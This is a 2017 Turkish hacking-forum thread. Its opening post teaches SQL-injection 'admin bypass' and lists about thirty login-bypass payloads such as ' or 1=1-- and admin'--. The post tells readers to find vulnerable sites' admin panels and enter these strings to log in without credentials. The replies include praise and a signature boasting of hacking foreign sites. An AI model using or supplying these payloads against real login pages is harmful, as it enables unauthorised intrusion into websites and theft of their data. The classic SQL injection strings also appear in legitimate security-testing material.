THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

/ Admin Bypass Yöntemi nedir? + Kullanımı / Stajyer /

Leopic - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2016
Mesajlar:
9.946
Konular:
2066
Teşekkür (Etti):
28
Teşekkür (Aldı):
4338
Ticaret:
(0) %
07-02-2017 15:57
#1
/ Admin Bypass Yöntemi nedir? + Kullanımı / Stajyer /
Merhaba Arkadaşlar. Tekrardan özgün bir konu ile karşınızdayım.



SQL açıgı olan sitede SQL admin bypass yöntemini kullanabiliriz.


Admin bypass yöntemi nedir?:






sosyaleo.com/admin diyelim.


Normal şartlarda buraya Admin bilgilerini girdiginiz zaman sayfaya erişebiliyorsunuz. Fakat biz admin ıd-pw bilmedigimiz için buraya bypass yöntemini uyguluyacagız.



Bypass kodları vardır. Googleye SQL bypass kodları diye aradıgımızda SQL açıgı ile alakalı oluşturulmuş kullanılan kodlar vardır.






Kod:
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1-- 
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--






Bunların hepsi kullanılan admin bypass kodlarıdır. Bu kodları alıp admin panelinde deniyoruz. Kullanıcı adını şifresini bilmedigimiz taktirde bu kodlarla direk giriş yapabiliyoruz SQL bypass kodlarıyla.







Bu şekilde yönetici paneline erişebiliyoruz bu admin bypass yöntemidir. Admin panelini bulursunuz admin panel bilgilerini bilmediginiz taktirde bile bu SQL bypass kodları ile girebilirsiniz.


Eğer bypass kodları işe yarıyorsa bizi direk içeriye atıcaktır oturum açıcaktır.



Kullanıcı panellerinede bunu uyguluyabilirsiniz.




Konu tamamen bana aittir arkadaşlar teşekkür ediyorum iyi günler dilerim.
Axsus Teşekkür etti.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.585
Konular:
489
Teşekkür (Etti):
1158
Teşekkür (Aldı):
2335
Ticaret:
(0) %
07-02-2017 16:11
#2
Ellerine sağlık abi
SoldieR 57 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
ك*
Mesajlar:
912
Konular:
94
Teşekkür (Etti):
124
Teşekkür (Aldı):
145
Ticaret:
(0) %
07-02-2017 16:18
#3
Eline saglık stajerlikte başarılar
---------------------
☪ SoldieR 57 ☪
HANi OSMANLIYI BiLiRSiNiZYA BiZDE TORUNLARIYIZ.
YABANCI SiTE HACKLEMEYE , TÜRK SiTE UYARMAYA DEVAM...

Eski Turan Ordusu Üyesi

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler